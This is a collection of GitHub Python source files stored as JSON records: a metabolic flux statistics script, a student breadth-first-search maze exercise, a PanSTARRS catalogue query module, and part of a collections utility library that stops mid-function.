np.mean(nonzerovals)\n for j in range(len(interactMat[i])):\n interactMat2[i,j] += nonzeromean\n for i in range(len(interactMat[0])):\n nonzerovals = interactMat[interactMat[:,i]!=0,i]\n if len(nonzerovals)!=0:\n nonzeromean = np.mean(nonzerovals)\n for j in range(len(interactMat)):\n interactMat2[j,i] += nonzeromean\n [eigvals,eigvectors] = np.linalg.eig(interactMat2)\n if len(eigminarr)==0:\n for k in range(len(eigvals)):\n eigminarr.append(eigvals[k].real)\n else:\n for k in range(len(eigminarr)):\n if eigvals[k]eigmaxarr[k]:\n eigmaxarr[k] = eigvals[k].real\n if len(eigmeanarr)==0:\n for k in range(len(eigvals)):\n eigmeanarr.append(eigvals[k].real)\n else:\n for k in range(len(eigmeanarr)):\n eigmeanarr[k] += eigvals[k].real\n print(grouplabelarr[z1])\n print(grouparr[z1][z])\n print(eigvals[:10])\n outFI = open('/mnt/vdb/home/ubuntu2/interactMatTemp'+grouparr[z1][z]+'.txt','w')\n for i in range(len(interactMat2)):\n for j in range(len(interactMat2)-1):\n outFI.write(str(interactMat2[i,j])+'\\t')\n outFI.write(str(interactMat2[i,772])+'\\n')\n outFI.close()\n return [eigminarr,eigmaxarr,eigmeanarr]\n \nif __name__=='__main__':\n\n inFI = open('/mnt/vdb/home/ubuntu2/tobemerged2.txt')\n tobemerged2map = {}\n for line in inFI:\n words = line.strip().split('\\t')\n if len(words)==2:\n words.append('')\n tobemerged2map[words[0]] = [words[1],words[2]]\n inFI.close()\n\n inputDir = '/mnt/vdb/home/ubuntu2/MATLAB/SEED/output/simulateSmallModelsCombined/'\n\n #diabetesctrl = ['BGI-06A','N044A','SZEY-75A']\n #diabetestype2nomet = ['NG-5636_551','DOM024','DLM001']\n diabetesctrl = ['BGI-06A','N044A','SZEY-75A','MH0189','MH0181','N029A','NLM031','MH0439','MH0431','MH0024']\n diabetestype2nomet = ['NG-5636_551','DOM024','DLM001','MH0334','DLM027','MH0370','DOM023','DLM019','DLM028','DLM012','MH0345']\n HMP2Normal = ['206703','206704','206700']\n HMP2IBD = ['206701','206708','206709']\n MHnormal = ['MH0005','MH0006','MH0008']\n MHobese = ['MH0001','MH0002','MH0003']\n grouparr = [diabetesctrl,diabetestype2nomet]#,HMP2Normal,HMP2IBD,MHnormal,MHobese]\n grouplabelarr = ['diabetesctrl','diabetestype2nomet']#,'HMP2Normal','HMP2IBD','MHnormal','MHobese']\n analyzeSingle = True\n for z1 in range(len(grouparr)):\n if not analyzeSingle:\n eigminarr = []\n eigmaxarr = []\n eigmeanarr = []\n if z1%2==0:\n rxndiffmap = {}\n for z in range(len(grouparr[z1])):\n count = 0\n interactMat = np.zeros([773,773])\n bigmap = {}\n for afileorig in os.listdir(inputDir):\n if afileorig.endswith('.txt'):\n afile = afileorig[:len(afileorig)-4]\n words = afile.split('_')\n if words[1]==grouparr[z1][z] and ((analyzeSingle and len(words)==3) or (not analyzeSingle and len(words)==4)):\n count = count+1\n print(count)\n ithIdx = int(words[2])\n if not analyzeSingle:\n jthIdx = int(words[3])\n inFI = open(inputDir+afileorig)\n inFI.readline()\n for line in inFI:\n linewords = line.strip().split('\\t')\n speciesnum = -1\n if (linewords[2].split('_')[0]=='1' or linewords[2].split('_')[0]=='2') or analyzeSingle:\n if (linewords[2].split('_')[0]=='1' or linewords[2].split('_')[0]=='2'):\n speciesnum = int(linewords[2].split('_')[0])\n rxn = linewords[2].split('_')\n rxn = '_'.join(rxn[1:])\n elif analyzeSingle:\n rxn = linewords[2]\n rxn = rxn.replace('_LSQBKT','')\n rxn = rxn.replace('_RSQBKT','')\n rxn = rxn.replace('_LPAREN','')\n rxn = rxn.replace('_RPAREN','')\n rxn = rxn.replace('DASH','-')\n if rxn not in rxndiffmap:\n rxndiffmap[rxn] = [{},{}]\n if z1%2==0:\n if ithIdx not in rxndiffmap[rxn][0]:\n rxndiffmap[rxn][0][ithIdx] = []\n rxndiffmap[rxn][0][ithIdx].append(float(linewords[0]))\n else:\n if ithIdx not in rxndiffmap[rxn][1]:\n rxndiffmap[rxn][1][ithIdx] = []\n rxndiffmap[rxn][1][ithIdx].append(float(linewords[0]))\n if not analyzeSingle:\n if ithIdx not in bigmap:\n bigmap[ithIdx] = {}\n if jthIdx not in bigmap[ithIdx]:\n bigmap[ithIdx][jthIdx] = {}\n if rxn not in bigmap[ithIdx][jthIdx]:\n bigmap[ithIdx][jthIdx][rxn] = [0,0]\n #print('HERE')\n bigmap[ithIdx][jthIdx][rxn][speciesnum-1] = float(linewords[0])\n\n if not analyzeSingle:\n [eigminarr,eigmaxarr,eigmeanarr] = calcEigs(bigmap,eigminarr,eigmaxarr,eigmeanarr)\n\n if not analyzeSingle:\n onetoten = ['_01','_02','_03','_04','_05','_06','_07','_08','_09','_10']\n for k in range(len(eigmeanarr)):\n eigmeanarr[k] = eigmeanarr[k]/3\n writeData([onetoten,eigmeanarr,eigminarr,eigmaxarr],'/mnt/vdb/home/ubuntu2/eig'+grouplabelarr[z1]+'.txt',delimiter='\\t',headers=['eignum','eigval','lower','upper'])\n\n if z1%2==1:\n if analyzeSingle:\n rxndiffmaptemp = {}\n for rxn in rxndiffmap:\n rxndiffmaptemp[rxn] = [[],[]]\n for k in [0,1]:\n for ithIdx in rxndiffmap[rxn][k]:\n rxndiffmaptemp[rxn][k].append(np.mean(rxndiffmap[rxn][k][ithIdx]))\n if k==0:\n k1=1\n else:\n k1=0\n if ithIdx in rxndiffmap[rxn][k1]:\n rxndiffmaptemp[rxn][k1].append(np.mean(rxndiffmap[rxn][k1][ithIdx]))\n else:\n rxndiffmaptemp[rxn][k1].append(0)\n rxndiffmap = rxndiffmaptemp\n else:\n rxndiffmaptemp = {}\n for rxn in rxndiffmap:\n rxndiffmaptemp[rxn] = [[],[]]\n for k in [0,1]:\n for ithIdx in rxndiffmap[rxn][k]:\n for l in range(len(rxndiffmap[rxn][k][ithIdx])):\n rxndiffmaptemp[rxn][k].append(rxndiffmap[rxn][k][ithIdx][l])\n rxndiffmap = rxndiffmaptemp\n \n if z1==1:\n diabetesrxndiffmap = rxndiffmap\n if z1==3:\n IBDrxndiffmap = rxndiffmap\n if z1==5:\n normobeserxndiffmap = rxndiffmap\n if z1%2==1:\n rxnarr = rxndiffmap.keys()\n rxnarr.sort()\n pvalarr = []\n rxnnamearr = []\n subarr = []\n meandiffarr = []\n for rxn in rxnarr:\n maxlen = max(len(rxndiffmap[rxn][0]),len(rxndiffmap[rxn][1]))\n if len(rxndiffmap[rxn][0])==0:\n for k in range(len(rxndiffmap[rxn][0]),maxlen):\n rxndiffmap[rxn][0].append(0)\n if len(rxndiffmap[rxn][1])==0:\n for k in range(len(rxndiffmap[rxn][1]),maxlen):\n rxndiffmap[rxn][1].append(0) \n if max(rxndiffmap[rxn][0])!=max(rxndiffmap[rxn][1]) or min(rxndiffmap[rxn][0])!=min(rxndiffmap[rxn][1]):\n if not analyzeSingle:\n [stat, pval] = scipy.stats.mannwhitneyu(rxndiffmap[rxn][0],rxndiffmap[rxn][1])\n else:\n statdiffarr = []\n for k in range(len(rxndiffmap[rxn][0])):\n statdiffarr.append(rxndiffmap[rxn][0][k]-rxndiffmap[rxn][1][k])\n [stat, pval] = scipy.stats.ttest_1samp(statdiffarr,0)\n else:\n pval = 1\n pvalarr.append(pval)\n rxncand = rxn\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_c_','c')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_m_','m')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_e_','e')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_p_','p')\n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('EX','EX_')\n if rxncand not in tobemerged2map and rxn.startswith('EX_'):\n rxncand = rxn.replace('_','')\n rxncand = rxncand.replace('EX','EX_')\n \n if rxncand not in tobemerged2map:\n rxncand = rxn.replace('_','')\n rxnnamearr.append(tobemerged2map[rxncand][0])\n subarr.append(tobemerged2map[rxncand][1])\n meandiffarr.append(np.mean(rxndiffmap[rxn][0])-np.mean(rxndiffmap[rxn][1]))\n diffout = '/mnt/vdb/home/ubuntu2/pairwiseSingleSpeciesRxnDistsDiabetes/'+rxncand+'DiffMap.txt'\n rxndiffarr = []\n highlightarr = []\n for k in range(len(rxndiffmap[rxn][0])):\n rxndiffarr.append(rxndiffmap[rxn][0][k])\n highlightarr.append('ctrl')\n for k in range(len(rxndiffmap[rxn][1])):\n rxndiffarr.append(rxndiffmap[rxn][1][k])\n highlightarr.append('t2d')\n writeData([rxndiffarr,highlightarr],diffout,delimiter='\\t',headers=['flux','highlight'])\n\n uniqSubs = np.unique(subarr)\n numrxnsall = []\n numsigrxnsall = []\n hypergeomparrall = []\n for sub in uniqSubs:\n N = len(rxnarr)\n M = sum(np.array(subarr)==sub)\n K = sum(np.array(pvalarr)<.05)\n x = sum(np.logical_and(np.array(pvalarr)<.05,np.array(subarr)==sub))\n numrxnsall.append(M)\n numsigrxnsall.append(x)\n hypergeomparrall.append(1-hypergeom.cdf(x-1,N,M,K))\n numrxnspos = []\n numsigrxnspos = []\n hypergeomparrpos = []\n for sub in uniqSubs:\n N = len(rxnarr)\n M = sum(np.array(subarr)==sub)\n K = sum(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)>0))\n x = sum(np.logical_and(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)>0),np.array(subarr)==sub))\n numrxnspos.append(M)\n numsigrxnspos.append(x)\n hypergeomparrpos.append(1-hypergeom.cdf(x-1,N,M,K))\n numrxnsneg = []\n numsigrxnsneg = []\n hypergeomparrneg = []\n for sub in uniqSubs:\n N = len(rxnarr)\n M = sum(np.array(subarr)==sub)\n K = sum(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)<0))\n x = sum(np.logical_and(np.logical_and(np.array(pvalarr)<.05,np.array(meandiffarr)<0),np.array(subarr)==sub))\n numrxnsneg.append(M)\n numsigrxnsneg.append(x)\n hypergeomparrneg.append(1-hypergeom.cdf(x-1,N,M,K))\n\n if z1==1:\n disease='diabetes'\n if z1==3:\n disease='IBD'\n if z1==5:\n disease='normobese'\n if analyzeSingle:\n disease = 'SingleSpecies'+disease\n writeData([rxnarr,rxnnamearr,subarr,pvalarr,meandiffarr],'/mnt/vdb/home/ubuntu2/pairwiseRxnDiff'+disease+'.txt',delimiter='\\t',headers=['rxn','rxnname','sub','wilcoxon p-val','mean flux diff'])\n writeData([uniqSubs,numrxnsall,numsigrxnsall,hypergeomparrall],'/mnt/vdb/home/ubuntu2/pairwiseSubDiffAll'+disease+'.txt',delimiter='\\t',headers=['sub','num reactions','num sig reactions','hypergeometric p-val'])\n writeData([uniqSubs,numrxnspos,numsigrxnspos,hypergeomparrpos],'/mnt/vdb/home/ubuntu2/pairwiseSubDiffPos'+disease+'.txt',delimiter='\\t',headers=['sub','num reactions','num sig reactions','hypergeometric p-val'])\n writeData([uniqSubs,numrxnsneg,numsigrxnsneg,hypergeomparrneg],'/mnt/vdb/home/ubuntu2/pairwiseSubDiffNeg'+disease+'.txt',delimiter='\\t',headers=['sub','num reactions','num sig reactions','hypergeometric p-val'])\n","repo_name":"yw595/SEED","sub_path":"src/analyzeSmallModelsCombined.py","file_name":"analyzeSmallModelsCombined.py","file_ext":"py","file_size_in_byte":15257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33183904955","text":"\ndef create_maze():\n maze = {\n # defining the maze\n # (COLUMN, ROW)\n # following what mr yessen made in class\n (0, 0): [(0, 1)],\n (0, 1): [(0, 2)],\n (0, 2): [(0, 3)],\n (0, 3): [(0, 4), (1, 3)],\n (1, 3): [(1, 2), (1, 4), (2, 3)],\n (2, 3): [],\n (1, 2): [(1, 1)],\n (1, 1): [(1, 0)],\n (1, 0): [(2, 0)],\n (2, 0): [(3, 0)],\n (3, 0): [(3, 1)],\n (3, 1): [(2, 1), (3, 2)],\n (2, 1): [],\n (3, 2): [(2, 2), (4, 2)],\n (2, 2): [],\n (4, 2): [(4, 1)],\n (0, 4): [],\n (1, 4): [(2, 4)],\n (2, 4): [(3, 4)],\n (3, 4): [(4, 4)],\n (4, 4): [(4, 3)],\n (4, 3): [(3, 3)],\n (3, 3): []\n }\n return maze\n\ndef bfs(maze, start, end):\n visited = []\n bfs_q = []\n bfs_q.append(start)\n\n while bfs_q:\n z = bfs_q.pop(0)\n visited.append(z)\n if len(visited) == 1:\n print(\"visit:\", z, \"(S)\")\n else:\n print(\"visit:\", z)\n\n if z == end:\n print(\"\\n\")\n print(\"end of the point:\", end, \"(G)\")\n break\n\n for i in maze[z]:\n if i not in visited and i not in bfs_q:\n bfs_q.append(i)\n print(\"the neighbour added:\", i)\n\n# run BFS\ndef main():\n while True:\n print(\"1. Use default starting point (0.0) and ending point (2,1) \")\n print(\"2. Manually enter between (0,0) to (4,4)\")\n a = input(\"Please choose between 1 and 2: \")\n\n if a == '1':\n start = (0, 0)\n target = (2, 1)\n break\n elif a == '2':\n start = eval(input(\"Please enter your point of start (0,0 to 4,4) as (column, row): \"))\n target = eval(input(\"Please enter your point of end (0,0 to 4,4) as (column, row): \"))\n if 0 <= start[0] <= 5 and 0 <= start[1] <= 5 and 0 <= target[0] <= 5 and 0 <= target[1] <= 5:\n break\n else:\n print(\"Invalid input. Row and column values must be between 0 and 5.\")\n else:\n print(\"Invalid choice. Please enter 1 or 2.\")\n \n maze = create_maze()\n bfs(maze, start, target)\n\nwhile True:\n main()\n print(\"\\n\")\n try_again = input(\"Do you want to try again? (y): \")\n if try_again.lower() == \"y\":\n continue\n else:\n print(\"Thank you!\")\n break\n\n\n#I actually have tried to make a different version of the maze, not following the one in class\n#but sadly it doesnt work as how i wished it work..\n\n# def create_maze():\n# maze = [\n# # top, left, bottom, right\n# # 0 = no wall, 1 = wall, 2 = path\n# [[1, 1, 0, 1], [1, 1, 0, 0], [1, 0, 1, 0], [1, 0, 0, 1], [1, 1, 0, 1]], # row 1\n# [[0, 1, 0, 1], [0, 1, 0, 1], [1, 1, 1, 0], [0, 0, 0, 1], [0, 1, 0, 1]], # row 2\n# [[0, 1, 0, 1], [0, 1, 0, 1], [1, 1, 1, 0], [0, 0, 1, 0], [0, 0, 0, 1]], # row 3\n# [[0, 1, 0, 0], [0, 0, 0, 0], [1, 0, 1, 1], [1, 1, 1, 0], [0, 0, 0, 1]], # row 4\n# [[0, 1, 1, 1], [0, 1, 1, 0], [1, 0, 1, 0], [1, 0, 1, 0], [0, 0, 1, 1]], # row 5\n# ]\n# return maze\n# def is_valid_move(row, col, maze, visited):\n# # 5 is the number of row and column\n# if 0 <= row < 5:\n# if 0 <= col < 5:\n# if (row, col) not in visited: #have to be not visited to avoid revisiting cells that have been visited\n# for i in range (4):\n# if maze[row][col][i]==0:\n# return True\n# else:\n# return False\n# return False\n# maze = create_maze()\n# r_start, c_start = 0, 0\n# r_end, c_end = 1, 2\n# end = (r_end, c_end)\n# visited = set()\n# Q = [(r_start, c_start)] \n\n# while Q:\n# u = Q.pop(0)\n# visited.add(u)\n\n# if u == end:\n# print(\"Reached the target (row, column): \" + str(end))\n# break\n\n# row, col = u\n\n# #direction of movement\n# moves = [(-1, 0), (0, -1), (1, 0), (0, 1)] # top,left,bottom, down\n# for move in moves:\n# new_row, new_col = row + move[0], col + move[1]\n# if is_valid_move(new_row, new_col, maze, visited):\n# Q.append((new_row, new_col)) #appending to the Q\n# visited.add((new_row, new_col)) # input to visited\n\n# print(\"Current bfs_q:\", Q)\n\n# print(\"Visited cells:\", visited)\n","repo_name":"willamjonathan/AI","sub_path":"assignment1/1_maze.py","file_name":"1_maze.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4822352637","text":"import mastcasjobs\nimport healpy as hp\nimport numpy as np\nimport requests\nimport os, sys, re\nimport json\nfrom astropy.io import ascii, fits\nfrom astropy.table import Table, join, hstack, vstack\n\n\ndef parameters(nside,pixel):\n radius = hp.pixelfunc.max_pixrad(nside, degrees=True)*3600\n angles = hp.pix2ang(nside,int(pixel), nest = False, lonlat=True)\n return angles, radius\n \n \ndef fixcolnames(tab):\n \"\"\"Fix column names returned by the casjobs query\n \n Parameters\n ----------\n tab (astropy.table.Table): Input table\n\n Returns reference to original table with column names modified\"\"\"\n\n pat = re.compile(r'\\[(?P[^[]+)\\]')\n for c in tab.colnames:\n m = pat.match(c)\n if not m:\n raise ValueError(\"Unable to parse column name '{}'\".format(c))\n newname = m.group('name')\n tab.rename_column(c,newname)\n return tab\n\ndef query_string(ang0,ang1,radius):\n query = \"\"\"select sot.objID, sot.uniquePspsSTid, sot.ippObjID, sot.surveyID, sot.tessID, sot.projectionID, sot.skyCellID, sot.randomStackObjID, sot.primaryDetection, sot.bestDetection, sot.dvoRegionID, sot.processingVersion,\n sot.gippDetectID, sot.gstackDetectID, sot.gstackImageId, sot.gra, sot.gdec, sot.graErr, sot.gdecErr, sot.gEpoch, sot.gPSFMag, sot.gPSFMagErr, sot.gApMag, sot.gApMagErr, sot.gKronMag, sot.gKronMagErr, sot.ginfoFlag, sot.ginfoFlag2, sot.ginfoFlag3, sot.gnFrames,\n sot.rippDetectID, sot.rstackDetectID, sot.rstackImageId, sot.rra, sot.rdec, sot.rraErr, sot.rdecErr, sot.rEpoch, sot.rPSFMag, sot.rPSFMagErr, sot.rApMag, sot.rApMagErr, sot.rKronMag, sot.rKronMagErr, sot.rinfoFlag, sot.rinfoFlag2, sot.rinfoFlag3, sot.rnFrames,\n sot.iippDetectID, sot.istackDetectID, sot.istackImageId, sot.ira, sot.idec, sot.iraErr, sot.idecErr, sot.iEpoch, sot.iPSFMag, sot.iPSFMagErr, sot.iApMag, sot.iApMagErr, sot.iKronMag, sot.iKronMagErr, sot.iinfoFlag, sot.iinfoFlag2, sot.iinfoFlag3, sot.inFrames,\n sot.zippDetectID, sot.zstackDetectID, sot.zstackImageId, sot.zra, sot.zdec, sot.zraErr, sot.zdecErr, sot.zEpoch, sot.zPSFMag, sot.zPSFMagErr, sot.zApMag, sot.zApMagErr, sot.zKronMag, sot.zKronMagErr, sot.zinfoFlag, sot.zinfoFlag2, sot.zinfoFlag3, sot.znFrames,\n sot.yippDetectID, sot.ystackDetectID, sot.ystackImageId, sot.yra, sot.ydec, sot.yraErr, sot.ydecErr, sot.yEpoch, sot.yPSFMag, sot.yPSFMagErr, sot.yApMag, sot.yApMagErr, sot.yKronMag, sot.yKronMagErr, sot.yinfoFlag, sot.yinfoFlag2, sot.yinfoFlag3, sot.ynFrames\n \n\n from fGetNearbyObjEq(\"\"\"+\",\".join([str(ang0),str(ang1),str(radius/60.)])+\"\"\") nb\n inner join StackObjectThin sot on sot.objid=nb.objid\n\n where sot.primaryDetection = 1 \n\"\"\" \n return query\n \n \n\ndef query_function(params, constraints):\n import exception as exc\n params['ang'],params['r'] = parameters(params[\"NSIDE\"],params['pixel']) \n query = query_string(params['ang'][0],params['ang'][1],params['r'])\n jobs = mastcasjobs.MastCasJobs(context=\"PanSTARRS_DR2\")\n \n try:\n table = jobs.quick(query, task_name=\"python cone search\")\n except Exception:\n print(\"Exception. code!=200\")\n table = exc.handling_exception(params,constraints)\n print(\"Extracted {} objects from PS1\".format(len(table)))\n return table, jobs \n\n table = fixcolnames(ascii.read(table))\n table = query_constraints(table, constraints)\n return table, jobs\n\ndef query_constraints(table,constraints):\n band_KronMag = table[''.join([constraints[\"band\"],'KronMag'])]\n band_PSFMag = table[''.join([constraints[\"band\"],'PSFMag'])]\n\n if constraints['use']:\n if constraints[\"type\"]==\"galaxy\":\n constraint = (band_KronMag - band_PSFMag) + 0.192 - 0.120*(band_KronMag - 21.) - 0.018*(band_KronMag - 21.)*(band_KronMag - 21.)\n list1 = np.where((table['gdec']>-999)*(table['gra']>-999)*(band_KronMag>-999)*(band_PSFMag>-999)*(constraint>0)) \n \n elif constraints[\"type\"]==\"star\":\n constraint = (band_KronMag - band_PSFMag) + 0.192 - 0.120*(band_KronMag - 21.) - 0.018*(band_KronMag - 21.)*(band_KronMag - 21.)\n list1 = np.where((table['gdec']>-999)*(table['gra']>-999)*(band_KronMag>-999)*(band_PSFMag>-999)*(constraint<0))\n \n else: \n list1 = np.where((table['gdec']>-999)*(table['gra']>-999)*(band_KronMag>-999)*(band_PSFMag>-999))\n else:\n list1 = np.where((table['gdec']>-999)*(table['gra']>-999))\n \n return table[list1]\n","repo_name":"multinverse/PS1zxcorr","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9116910645","text":"import collections as col\r\nimport copy\r\nimport itertools\r\nimport math\r\nimport operator\r\n\r\nimport thalesians.tsa.intervals as intervals\r\n\r\ndef sequence_eq(sequence1, sequence2):\r\n return len(sequence1) == len(sequence2) and all(map(operator.eq, sequence1, sequence2))\r\n\r\ndef cmp(x, y):\r\n return (x > y) - (x < y)\r\n\r\ndef most_common(iterable):\r\n sorted_iterable = sorted((x, i) for i, x in enumerate(iterable))\r\n groups = itertools.groupby(sorted_iterable, key=operator.itemgetter(0))\r\n def _auxfun(g):\r\n _, it = g\r\n count = 0\r\n min_index = len(iterable)\r\n for _, where in it:\r\n count += 1\r\n min_index = min(min_index, where)\r\n return count, -min_index\r\n return max(groups, key=_auxfun)[0]\r\n\r\ndef prepend(collection, to_prepend, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n collection[0:0] = to_prepend\r\n return collection\r\n\r\ndef _pad_on_left_with_callable(collection, new_len, padding=None):\r\n return prepend(collection, [padding() for _ in range(new_len - len(collection))], in_place=True)\r\n\r\ndef _pad_on_left_with_noncallable(collection, new_len, padding=None):\r\n return prepend(collection, [padding for _ in range(new_len - len(collection))], in_place=True)\r\n\r\ndef pad_on_left(collection, new_len, padding=None, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n if hasattr(padding, '__call__') or isinstance(padding, col.Callable):\r\n return _pad_on_left_with_callable(collection, new_len, padding)\r\n else:\r\n return _pad_on_left_with_noncallable(collection, new_len, padding)\r\n\r\ndef _pad_on_right_with_callable(collection, new_len, padding=None):\r\n collection.extend([padding() for _ in range(new_len - len(collection))])\r\n return collection\r\n\r\ndef _pad_on_right_with_noncallable(collection, new_len, padding=None):\r\n collection.extend([padding for _ in range(new_len - len(collection))])\r\n return collection\r\n\r\ndef pad_on_right(collection, new_len, padding=None, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n if hasattr(padding, '__call__') or isinstance(padding, col.Callable):\r\n return _pad_on_right_with_callable(collection, new_len, padding)\r\n else:\r\n return _pad_on_right_with_noncallable(collection, new_len, padding)\r\n\r\ndef trim_on_left(collection, new_len, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n del collection[:max(len(collection) - new_len, 0)]\r\n return collection\r\n\r\ndef trim_on_right(collection, new_len, in_place=False):\r\n if not in_place: collection = copy.copy(collection)\r\n del collection[new_len:]\r\n return collection\r\n\r\ndef xconst(value):\r\n while True: yield value\r\n\r\ndef xbatch(size, iterable):\r\n l = len(iterable)\r\n for i in range(0, l, size):\r\n yield iterable[i:min(i + size, l)]\r\n\r\ndef batch(size, iterable):\r\n return list(xbatch(size, iterable))\r\n\r\ndef peek(iterable, size=1):\r\n objs = []\r\n for _ in range(size):\r\n try:\r\n obj = next(iterable)\r\n except StopIteration:\r\n break\r\n objs.append(obj)\r\n return objs, itertools.chain(objs, iterable)\r\n\r\nclass Bracket(object):\r\n def __init__(self, interval, interval_offset):\r\n self.interval = interval\r\n self.interval_offset = interval_offset\r\n self._str_Bracket = None\r\n \r\n def __eq__(self, other):\r\n return self.interval == other.interval and self.interval_offset == other.interval_offset\r\n \r\n def __str__(self):\r\n if self._str_Bracket is None:\r\n self._str_Bracket = '{' + str(self.interval) + ', ' + str(self.interval_offset) + '}'\r\n return self._str_Bracket\r\n \r\n def __repr__(self):\r\n return str(self)\r\n\r\ndef bracket(iterable, origin, interval_size, already_sorted=False, intervals_right_closed=False, coalesce=False):\r\n if not already_sorted:\r\n sorted_indices, iterable = zip(*sorted([(i, v) for i, v in enumerate(iterable)], key=operator.itemgetter(1)))\r\n \r\n brackets = []\r\n bracket_indices = []\r\n \r\n interval_offset = None\r\n interval_left = None\r\n interval_right = None\r\n \r\n for x in iterable:\r\n if interval_offset is None or x - interval_left >= interval_size:\r\n new_interval_offset = (x - origin) // interval_size\r\n new_interval_left = origin + new_interval_offset * interval_size\r\n \r\n if intervals_right_closed and x == new_interval_left:\r\n new_interval_offset -= 1\r\n new_interval_left -= interval_size\r\n \r\n if coalesce and (interval_offset is not None) and (new_interval_left <= brackets[-1].interval.right):\r\n interval_right = new_interval_left + interval_size\r\n brackets[-1].interval = brackets[-1].interval.replace_right(interval_right)\r\n elif interval_offset is None or new_interval_offset != interval_offset:\r\n interval_offset = new_interval_offset\r\n interval_left = new_interval_left\r\n interval_right = interval_left + interval_size\r\n brackets.append(\r\n Bracket(intervals.Interval(interval_left,\r\n interval_right,\r\n not intervals_right_closed,\r\n intervals_right_closed),\r\n interval_offset))\r\n \r\n bracket_indices.append(len(brackets) - 1)\r\n \r\n if not already_sorted:\r\n new_bracket_indices = [None] * len(bracket_indices)\r\n for i in range(len(bracket_indices)):\r\n new_bracket_indices[sorted_indices[i]] = bracket_indices[i]\r\n bracket_indices = new_bracket_indices\r\n \r\n return brackets, bracket_indices\r\n\r\nclass FlatStoredArray(object):\r\n def __init__(self, *args):\r\n self.__count = self._getcount(*args)\r\n self._data = [None] * self.__count\r\n \r\n def _getcount(self):\r\n raise NotImplementedError('Pure virtual method')\r\n \r\n def _keytoindex(self, key):\r\n raise NotImplementedError('Pure virtual method')\r\n \r\n def _indextokey(self, index):\r\n raise NotImplementedError('Pure virtual method')\r\n\r\n def __getitem__(self, key):\r\n return self._data[self._keytoindex(key)]\r\n \r\n def __setitem__(self, key, value):\r\n self._data[self._keytoindex(key)] = value\r\n \r\n def __len__(self):\r\n return self.__count\r\n \r\n def __str__(self):\r\n return str(self._data)\r\n \r\n def __repr__(self):\r\n return repr(self._data)\r\n \r\n def setall(self, iterable):\r\n for i, v in enumerate(iterable):\r\n if i >= self.__count: break\r\n self._data[i] = v\r\n \r\n class __Iterator(object):\r\n def __init__(self, data):\r\n self._data = data\r\n self.__idx = 0\r\n \r\n def __iter__(self):\r\n return self\r\n \r\n def __next__(self):\r\n if self.__idx < len(self._data):\r\n v = self._data[self.__idx]\r\n self.__idx += 1\r\n return v\r\n raise StopIteration()\r\n\r\n def __iter__(self):\r\n return FlatStoredArray.__Iterator(self._data)\r\n \r\n class __KeysIterator(object):\r\n def __init__(self, collection):\r\n self.__collection = collection\r\n self.__idx = 0\r\n \r\n def __iter__(self):\r\n return self\r\n \r\n def __next__(self):\r\n if self.__idx < len(self.__collection):\r\n k = self.__collection._indextokey(self.__idx)\r\n self.__idx += 1\r\n return k\r\n raise StopIteration()\r\n \r\n def keys(self):\r\n return FlatStoredArray.__KeysIterator(self)\r\n\r\n class __ItemsIterator(object):\r\n def __init__(self, data, collection):\r\n self.__data = data\r\n self.__collection = collection\r\n self.__idx = 0\r\n \r\n def __iter__(self):\r\n return self\r\n \r\n def __next__(self):\r\n if self.__idx < len(self.__data):\r\n k = self.__collection._indextokey(self.__idx)\r\n v = self.__data[self.__idx]\r\n self.__idx += 1\r\n return k, v\r\n raise StopIteration()\r\n \r\n def items(self):\r\n return FlatStoredArray.__ItemsIterator(self._data, self)\r\n \r\nclass DiagonalArray(FlatStoredArray):\r\n def __init__(self, dim):\r\n super(DiagonalArray, self).__init__(dim)\r\n self.__dim = dim\r\n \r\n @property\r\n def dim(self): return self.__dim\r\n \r\n @classmethod\r\n def _getcount(cls, dim):\r\n return (dim*dim + dim) // 2\r\n \r\n @classmethod\r\n def _keytoindex(cls, key):\r\n i, j = key[0], key[1]\r\n if i < j: i, j = j, i\r\n return (i*i + i) // 2 + j\r\n \r\n @classmethod\r\n def _indextokey(self, index):\r\n i = int(math.sqrt(2*index))\r\n n = (i*i + i) // 2\r\n j = index - n\r\n if j < 0:\r\n i -= 1\r\n n = (i*i + i) // 2\r\n j = index - n\r\n return i, j\r\n \r\n @classmethod\r\n def mindim(cls, count):\r\n dim = int(math.sqrt(2*count))\r\n if cls._getcount(dim) < count:\r\n dim += 1\r\n return dim\r\n \r\n @classmethod\r\n def create(cls, obj):\r\n if isinstance(obj, DiagonalArray):\r\n res = DiagonalArray(obj.dim)\r\n res.setall(obj)\r\n elif isinstance(obj, SubdiagonalArray):\r\n res = DiagonalArray(obj.dim)\r\n for k, v in obj.items():\r\n self[k] = v\r\n else:\r\n res = DiagonalArray(cls.mindim(len(obj)))\r\n res.setall(obj)\r\n return res\r\n \r\n def tonumpyarray(self, fill=None, symmetric=False):\r\n import numpy as np\r\n if fill is None: fill = np.NAN\r\n res = np.empty((self.__dim, self.__dim))\r\n idx = 0\r\n for i in range(self.__dim):\r\n for j in range(i+1):\r\n res[i,j] = self._data[idx]\r\n if symmetric: res[j,i] = res[i,j]\r\n idx += 1\r\n if not symmetric: res[i,i+1:self.__dim] = fill\r\n return res\r\n \r\nclass SubdiagonalArray(FlatStoredArray):\r\n def __init__(self, dim):\r\n super(SubdiagonalArray, self).__init__(dim)\r\n self.__dim = dim\r\n \r\n @property\r\n def dim(self): return self.__dim\r\n \r\n @classmethod\r\n def _getcount(cls, dim):\r\n return (dim*dim - dim) // 2\r\n \r\n @classmethod\r\n def _keytoindex(cls, key):\r\n i, j = key[0], key[1]\r\n if i < j: i, j = j, i\r\n return (i*i - i) // 2 + j\r\n\r\n 